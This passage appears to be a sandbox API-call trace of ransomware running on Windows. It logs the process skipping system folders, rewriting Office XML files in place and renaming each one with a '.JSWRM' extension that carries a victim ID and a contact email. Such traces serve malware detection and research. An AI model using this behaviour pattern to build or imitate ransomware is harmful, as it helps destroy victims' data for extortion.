lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL112.XML", lpUsedDefaultChar=0x0) returned 12 [0139.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0139.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL112.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL112.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL112.XML", lpUsedDefaultChar=0x0) returned 12 [0139.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0139.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0139.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL112.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl112.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.049] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=494050) returned 1 [0139.049] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.049] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.062] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.062] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.063] CloseHandle (hObject=0x238) returned 1 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0139.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0139.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0139.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0139.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0139.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL112.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl112.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL112.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl112.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0139.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0139.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.065] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1fc39fa2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1fc39fa2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc39fa2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e08a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL115.XML", cAlternateFileName="")) returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2=".") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="..") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="...") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="windows") returned -1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="recovery") returned -1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="perflogs") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="documents and settings") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="system volume information") returned -1 [0139.065] lstrcmpiW (lpString1="PGLBL115.XML", lpString2="msocache") returned 1 [0139.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL115.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL115.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL115.XML", lpUsedDefaultChar=0x0) returned 12 [0139.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0139.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL115.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL115.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL115.XML", lpUsedDefaultChar=0x0) returned 12 [0139.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0139.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0139.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL115.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl115.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.067] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=123018) returned 1 [0139.067] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e080) returned 0x2501e8 [0139.067] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1e080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1e080, lpOverlapped=0x0) returned 1 [0139.078] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.078] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1e080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1e080, lpOverlapped=0x0) returned 1 [0139.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.079] CloseHandle (hObject=0x238) returned 1 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0139.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0139.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0139.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0139.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL115.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl115.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL115.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl115.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0139.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.080] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d791bfc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x169ba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL116.XML", cAlternateFileName="")) returned 1 [0139.080] lstrcmpiW (lpString1="PGLBL116.XML", lpString2=".") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="..") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="...") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="windows") returned -1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="recovery") returned -1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="perflogs") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="documents and settings") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="system volume information") returned -1 [0139.081] lstrcmpiW (lpString1="PGLBL116.XML", lpString2="msocache") returned 1 [0139.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL116.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL116.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL116.XML", lpUsedDefaultChar=0x0) returned 12 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL116.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL116.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL116.XML", lpUsedDefaultChar=0x0) returned 12 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL116.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl116.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.082] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=92602) returned 1 [0139.082] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.083] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x169b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x169b0, lpOverlapped=0x0) returned 1 [0139.090] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.090] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x169b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x169b0, lpOverlapped=0x0) returned 1 [0139.091] CloseHandle (hObject=0x238) returned 1 [0139.091] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL116.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl116.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL116.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl116.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.092] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x412c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL117.XML", cAlternateFileName="")) returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2=".") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="..") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="...") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="windows") returned -1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="recovery") returned -1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="perflogs") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="documents and settings") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="system volume information") returned -1 [0139.092] lstrcmpiW (lpString1="PGLBL117.XML", lpString2="msocache") returned 1 [0139.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL117.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL117.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL117.XML", lpUsedDefaultChar=0x0) returned 12 [0139.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL117.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL117.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL117.XML", lpUsedDefaultChar=0x0) returned 12 [0139.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL117.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl117.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.094] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16684) returned 1 [0139.094] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.094] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4120, lpOverlapped=0x0) returned 1 [0139.097] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.097] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4120, lpOverlapped=0x0) returned 1 [0139.097] CloseHandle (hObject=0x238) returned 1 [0139.097] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL117.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl117.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL117.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl117.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.098] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2763a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL118.XML", cAlternateFileName="")) returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2=".") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="..") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="...") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="windows") returned -1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="recovery") returned -1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="perflogs") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="documents and settings") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="system volume information") returned -1 [0139.098] lstrcmpiW (lpString1="PGLBL118.XML", lpString2="msocache") returned 1 [0139.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL118.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL118.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL118.XML", lpUsedDefaultChar=0x0) returned 12 [0139.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL118.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 